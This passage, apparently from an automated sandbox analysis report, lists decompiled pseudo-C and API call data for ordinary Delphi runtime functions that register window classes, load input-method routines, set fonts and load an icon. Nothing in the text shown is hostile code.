                                                                                  • Part of subcall function 0041C940: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C95E
                                                                                • GetClassInfoA.USER32 ref: 004543D9
                                                                                • RegisterClassA.USER32 ref: 004543F1
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                • SetWindowLongA.USER32 ref: 0045448D
                                                                                • SendMessageA.USER32 ref: 004544AF
                                                                                • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544C2
                                                                                • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544CD
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544DC
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544E9
                                                                                • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 00454500
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                • String ID: HpH$h{H$l@E
                                                                                • API String ID: 2103932818-3227393362
                                                                                • Opcode ID: 6ab2acdc5c7d5719350be9b99716f18ecc9a494cbdb557a77b08e715daafbf8c
                                                                                • Instruction ID: 6e4c490b6783f64956c43e3ed911a1460050a66f9724ccd8e5ea5c6e1907debb
                                                                                • Opcode Fuzzy Hash: 6ab2acdc5c7d5719350be9b99716f18ecc9a494cbdb557a77b08e715daafbf8c
                                                                                • Instruction Fuzzy Hash: 2A416270744200ABE710EF69DC81F6A37A8AB45308F55457AFE00EF2D3EA78B8448769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004409C0, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103registrylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E004409C0(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x440b38);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E004092A0("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404374(0x487b74, _v8);
				_t25 =  *0x487b74; // 0x22e0e78
				 *0x487b70 = GlobalAddAtomA(E004047D0(_t25));
				_t29 =  *0x487714; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E004092A0("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404374(0x487b78, _v20);
				_t35 =  *0x487b78; // 0x22e0e94
				 *0x487b72 = GlobalAddAtomA(E004047D0(_t35));
				_t38 =  *0x487b78; // 0x22e0e94
				 *0x487b7c = RegisterClipboardFormatA(E004047D0(_t38));
				 *0x487bb4 = E004141BC(1);
				E004405C4();
				 *0x487b64 = E004403EC(1, 1);
				_t47 = E00452F98(1, __edi);
				_t78 =  *0x486dac; // 0x487c00
				 *_t78 = _t47;
				_t49 = E0045407C(0, 1);
				_t80 =  *0x486c60; // 0x487bfc
				 *_t80 = _t49;
				_t50 =  *0x486c60; // 0x487bfc
				E00455B88( *_t50, 1);
				_t53 =  *0x4302b8; // 0x4302bc
				E00413760(_t53, 0x4327b4, 0x4327c4);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x46b8cc = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x440b3f);
				E00404320( &_v20);
				return E00404320( &_v8);
			}
























                                                                                0x004409c9
                                                                                0x004409cc
                                                                                0x004409d1
                                                                                0x004409d2
                                                                                0x004409d7
                                                                                0x004409da
                                                                                0x004409e6
                                                                                0x004409e9
                                                                                0x004409f7
                                                                                0x00440a04
                                                                                0x00440a09
                                                                                0x00440a19
                                                                                0x00440a23
                                                                                0x00440a28
                                                                                0x00440a2b
                                                                                0x00440a34
                                                                                0x00440a37
                                                                                0x00440a48
                                                                                0x00440a55
                                                                                0x00440a5a
                                                                                0x00440a6a
                                                                                0x00440a70
                                                                                0x00440a80
                                                                                0x00440a91
                                                                                0x00440a96
                                                                                0x00440aa7
                                                                                0x00440ab5
                                                                                0x00440aba
                                                                                0x00440ac0
                                                                                0x00440acb
                                                                                0x00440ad0
                                                                                0x00440ad6
                                                                                0x00440ad8
                                                                                0x00440ae1
                                                                                0x00440af0
                                                                                0x00440af5
                                                                                0x00440b04
                                                                                0x00440b08
                                                                                0x00440b15
                                                                                0x00440b15
                                                                                0x00440b1c
                                                                                0x00440b1f
                                                                                0x00440b22
                                                                                0x00440b2a
                                                                                0x00440b37

                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00440B38), ref: 004409E1
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00440A14
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00440A2F
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00440A65
                                                                                • RegisterClipboardFormatA.USER32 ref: 00440A7B
                                                                                  • Part of subcall function 004141BC: RtlInitializeCriticalSection.KERNEL32(004119BC,?,?,00440A91,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004141DB
                                                                                  • Part of subcall function 004405C4: SetErrorMode.KERNEL32(00008000), ref: 004405DD
                                                                                  • Part of subcall function 004405C4: GetModuleHandleA.KERNEL32(USER32,00000000,0044072A,?,00008000), ref: 00440601
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044060E
                                                                                  • Part of subcall function 004405C4: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,0044072A,?,00008000), ref: 0044062A
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044064C
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440661
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440676
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044068B
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004406A0
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004406B5
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004406CA
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004406DF
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 004406F4
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440709
                                                                                  • Part of subcall function 004405C4: SetErrorMode.KERNEL32(?,00440731,00008000), ref: 00440724
                                                                                  • Part of subcall function 00452F98: GetKeyboardLayout.USER32 ref: 00452FDD
                                                                                  • Part of subcall function 00452F98: GetDC.USER32(00000000), ref: 00453032
                                                                                  • Part of subcall function 00452F98: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045303C
                                                                                  • Part of subcall function 00452F98: ReleaseDC.USER32 ref: 00453047
                                                                                  • Part of subcall function 0045407C: LoadIconA.USER32(00400000,MAINICON), ref: 00454161
                                                                                  • Part of subcall function 0045407C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00454193
                                                                                  • Part of subcall function 0045407C: OemToCharA.USER32(?,?), ref: 004541A6
                                                                                  • Part of subcall function 0045407C: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004541E6
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00440AFF
                                                                                • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440B10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterReleaseSectionThread
                                                                                • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                • API String ID: 2984857458-1126952177
                                                                                • Opcode ID: 1018ce0efc8efdce6cc6525a3870734bce1b65eff92e5894b72814d9c40937eb
                                                                                • Instruction ID: cf8f2e16a86b900fa348f6b4382c58bee2ff4fefe60cf267411a8d94096d9238
                                                                                • Opcode Fuzzy Hash: 1018ce0efc8efdce6cc6525a3870734bce1b65eff92e5894b72814d9c40937eb
                                                                                • Instruction Fuzzy Hash: 484160B0A042449FD700EFB9D992A4E77B9EB49308B50497FF500E73A2DB38A910CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045407C, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E0045407C(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403918(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E0041B8BC(_t91, 0);
				_t42 =  *0x486be0; // 0x46b468
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x486be0; // 0x46b468
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x4556b0;
				}
				_t43 =  *0x486c7c; // 0x46b470
				_t109 =  *((short*)(_t43 + 2));
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x486c7c; // 0x46b470
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E004558A8;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E00403584(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E00403584(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00425320(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x486b10; // 0x48702c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E004256F0(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x455e18;
				_t60 =  *0x486b10; // 0x48702c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040AC1C(0x5c, _t109);
				_t110 = _t67;
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408B7C( &_v261, _t27);
				}
				_t69 = E0040AC44( &_v261, 0x2e, _t110);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44c59c
				E00404588(_t31, 0x100,  &_v261);
				_t75 =  *0x486a08; // 0x487034
				if( *_t75 == 0) {
					E00454384(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E00455FF4(_t90, 0x100);
				E00456934(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403970(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                                                                0x0045407c
                                                                                0x0045407c
                                                                                0x00454089
                                                                                0x0045408b
                                                                                0x0045408e
                                                                                0x0045408e
                                                                                0x00454093
                                                                                0x00454096
                                                                                0x0045409c
                                                                                0x004540a1
                                                                                0x004540ab
                                                                                0x004540ad
                                                                                0x004540b2
                                                                                0x004540b5
                                                                                0x004540b5
                                                                                0x004540bb
                                                                                0x004540c0
                                                                                0x004540c5
                                                                                0x004540c7
                                                                                0x004540cc
                                                                                0x004540cf
                                                                                0x004540cf
                                                                                0x004540d5
                                                                                0x004540e5
                                                                                0x004540f7
                                                                                0x004540ff
                                                                                0x00454104
                                                                                0x0045410a
                                                                                0x00454111
                                                                                0x00454118
                                                                                0x0045411e
                                                                                0x00454124
                                                                                0x0045412b
                                                                                0x00454132
                                                                                0x00454139
                                                                                0x0045414c
                                                                                0x0045414e
                                                                                0x00454159
                                                                                0x00454161
                                                                                0x0045416a
                                                                                0x0045416f
                                                                                0x0045416f
                                                                                0x00454175
                                                                                0x00454178
                                                                                0x0045418b
                                                                                0x00454193
                                                                                0x004541a6
                                                                                0x004541b3
                                                                                0x004541b8
                                                                                0x004541ba
                                                                                0x004541bc
                                                                                0x004541c5
                                                                                0x004541c5
                                                                                0x004541d2
                                                                                0x004541d9
                                                                                0x004541db
                                                                                0x004541db
                                                                                0x004541e6
                                                                                0x004541eb
                                                                                0x004541fc
                                                                                0x00454201
                                                                                0x00454209
                                                                                0x0045420d
                                                                                0x0045420d
                                                                                0x00454212
                                                                                0x00454216
                                                                                0x0045421a
                                                                                0x0045421e
                                                                                0x00454227
                                                                                0x0045422f
                                                                                0x00454236
                                                                                0x0045423b
                                                                                0x00454241
                                                                                0x00454243
                                                                                0x00454248
                                                                                0x0045424f
                                                                                0x00454259

                                                                                APIs
                                                                                • LoadIconA.USER32(00400000,MAINICON), ref: 00454161
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00454193
                                                                                • OemToCharA.USER32(?,?), ref: 004541A6
                                                                                • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004541E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Char$FileIconLoadLowerModuleName
                                                                                • String ID: ,pH$4pH$MAINICON
                                                                                • API String ID: 3935243913-227882389
                                                                                • Opcode ID: f53fe956146f441d54e70b7a00cf4f9a57cccc2ec6b3ccf925e9ace2007055e6
                                                                                • Instruction ID: dc94394b66be5087aa4e9421e0b69953404944942399699dc66eb831b3e2a9c9
                                                                                • Opcode Fuzzy Hash: f53fe956146f441d54e70b7a00cf4f9a57cccc2ec6b3ccf925e9ace2007055e6
                                                                                • Instruction Fuzzy Hash: 375194706042449FDB40EF39C885B897BE4AB15308F4540BAEC48DF397DBB9D988CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453774, Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E00453774(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x487bfc != 0) {
					_t54 =  *0x487bfc; // 0x22e1310
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x4538b9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x487bfc != 0) {
					_t52 =  *0x487bfc; // 0x22e1310
					E00455B88(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041ED08( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041ED08( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E0041EDEC( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041ED08( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E0041ED08( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041ED08( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E0041EB4C( *_t16, 0x80000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041EB4C( *_t17, 0x80000007);
				 *[fs:eax] = 0x80000007;
				_push(0x4538c0);
				if( *0x487bfc != 0) {
					_t38 =  *0x487bfc; // 0x22e1310
					return E00455B88(_t38, _v5);
				}
				return 0;
			}






















                                                                                0x00453774
                                                                                0x00453775
                                                                                0x00453777
                                                                                0x0045377e
                                                                                0x00453780
                                                                                0x0045378b
                                                                                0x0045378d
                                                                                0x00453798
                                                                                0x00453798
                                                                                0x0045379d
                                                                                0x0045379e
                                                                                0x004537a3
                                                                                0x004537a6
                                                                                0x004537b0
                                                                                0x004537b4
                                                                                0x004537b9
                                                                                0x004537b9
                                                                                0x004537cf
                                                                                0x004537eb
                                                                                0x004537f2
                                                                                0x004537f8
                                                                                0x004537d1
                                                                                0x004537d5
                                                                                0x004537dc
                                                                                0x004537e2
                                                                                0x004537e2
                                                                                0x004537fd
                                                                                0x00453814
                                                                                0x0045381b
                                                                                0x00453851
                                                                                0x0045385c
                                                                                0x00453863
                                                                                0x0045386a
                                                                                0x00453870
                                                                                0x0045381d
                                                                                0x00453824
                                                                                0x0045382b
                                                                                0x00453831
                                                                                0x0045383d
                                                                                0x00453844
                                                                                0x0045384a
                                                                                0x0045384a
                                                                                0x00453875
                                                                                0x00453880
                                                                                0x00453885
                                                                                0x00453890
                                                                                0x0045389a
                                                                                0x0045389d
                                                                                0x004538a9
                                                                                0x004538ae
                                                                                0x00000000
                                                                                0x004538b3
                                                                                0x004538b8

                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004537C8
                                                                                • CreateFontIndirectA.GDI32(?), ref: 004537D5
                                                                                • GetStockObject.GDI32(0000000D), ref: 004537EB
                                                                                  • Part of subcall function 0041EDEC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041EDF9
                                                                                • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00453814
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00453824
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0045383D
                                                                                • GetStockObject.GDI32(0000000D), ref: 00453863
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                • String ID:
                                                                                • API String ID: 2891467149-0
                                                                                • Opcode ID: 5009f49011f7d564ff28bd34120bc118aa850b4b66f9f7280cb06ec388a06ccd
                                                                                • Instruction ID: 28a1cf3aa5b0351315609d5fbf45b2813be3316eb6b6f31c26dce7917962f236
                                                                                • Opcode Fuzzy Hash: 5009f49011f7d564ff28bd34120bc118aa850b4b66f9f7280cb06ec388a06ccd
                                                                                • Instruction Fuzzy Hash: 5731D6747042059BE740FB6ADC56B9A73E4AB04705F5480B6BD08DB3D3DE38ED488B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00452F98, Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E00452F98(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				char _t67;
				void* _t77;
				struct HDC__* _t78;
				void* _t79;
				void* _t80;

				_t77 = __edi;
				_t67 = __edx;
				if(__edx != 0) {
					_t80 = _t80 + 0xfffffff0;
					_t25 = E00403918(_t25, _t79);
				}
				_v5 = _t67;
				_t65 = _t25;
				E0041B8BC(_t66, 0);
				_t28 =  *0x486ab0; // 0x46b458
				 *((intOrPtr*)(_t28 + 4)) = _t65;
				 *_t28 = 0x45333c;
				_t29 =  *0x486abc; // 0x46b460
				 *((intOrPtr*)(_t29 + 4)) = _t65;
				 *_t29 = 0x453348;
				E00453354(_t65);
				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t65 + 0x4c)) = E00403584(1);
				 *((intOrPtr*)(_t65 + 0x50)) = E00403584(1);
				 *((intOrPtr*)(_t65 + 0x54)) = E00403584(1);
				 *((intOrPtr*)(_t65 + 0x58)) = E00403584(1);
				 *((intOrPtr*)(_t65 + 0x7c)) = E00403584(1);
				_t78 = GetDC(0);
				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
				ReleaseDC(0, _t78);
				_t11 = _t65 + 0x58; // 0x44c4386e
				_t48 =  *0x486bf0; // 0x487ab0
				 *((intOrPtr*)( *_t48))(0, 0, E0044F81C,  *_t11);
				 *((intOrPtr*)(_t65 + 0x84)) = E0041E978(1);
				 *((intOrPtr*)(_t65 + 0x88)) = E0041E978(1);
				 *((intOrPtr*)(_t65 + 0x80)) = E0041E978(1);
				E00453774(_t65, _t65, _t66, _t77);
				_t15 = _t65 + 0x84; // 0x38004010
				_t59 =  *_t15;
				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
				 *((intOrPtr*)(_t59 + 8)) = 0x453650;
				_t18 = _t65 + 0x88; // 0x90000000
				_t60 =  *_t18;
				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
				 *((intOrPtr*)(_t60 + 8)) = 0x453650;
				_t21 = _t65 + 0x80; // 0x94000000
				_t61 =  *_t21;
				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
				 *((intOrPtr*)(_t61 + 8)) = 0x453650;
				_t62 = _t65;
				if(_v5 != 0) {
					E00403970(_t62);
					_pop( *[fs:0x0]);
				}
				return _t65;
			}






















                                                                                0x00452f98
                                                                                0x00452f98
                                                                                0x00452fa0
                                                                                0x00452fa2
                                                                                0x00452fa5
                                                                                0x00452fa5
                                                                                0x00452faa
                                                                                0x00452fad
                                                                                0x00452fb3
                                                                                0x00452fb8
                                                                                0x00452fbd
                                                                                0x00452fc0
                                                                                0x00452fc6
                                                                                0x00452fcb
                                                                                0x00452fce
                                                                                0x00452fd6
                                                                                0x00452fe2
                                                                                0x00452ff1
                                                                                0x00453000
                                                                                0x0045300f
                                                                                0x0045301e
                                                                                0x0045302d
                                                                                0x00453037
                                                                                0x00453041
                                                                                0x00453047
                                                                                0x0045304c
                                                                                0x0045305a
                                                                                0x00453061
                                                                                0x0045306f
                                                                                0x00453081
                                                                                0x00453093
                                                                                0x0045309b
                                                                                0x004530a0
                                                                                0x004530a0
                                                                                0x004530a6
                                                                                0x004530a9
                                                                                0x004530b0
                                                                                0x004530b0
                                                                                0x004530b6
                                                                                0x004530b9
                                                                                0x004530c0
                                                                                0x004530c0
                                                                                0x004530c6
                                                                                0x004530c9
                                                                                0x004530d0
                                                                                0x004530d6
                                                                                0x004530d8
                                                                                0x004530dd
                                                                                0x004530e4
                                                                                0x004530ed

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CapsDeviceKeyboardLayoutRelease
                                                                                • String ID:
                                                                                • API String ID: 3331096196-0
                                                                                • Opcode ID: c72c351962200b131c488cf0c1afd427d9df9e7a02fae81aa34f181e99381d86
                                                                                • Instruction ID: d6432707c957d0cacee8399d567b12e74fb03ad8e22360b452518030eba30be5
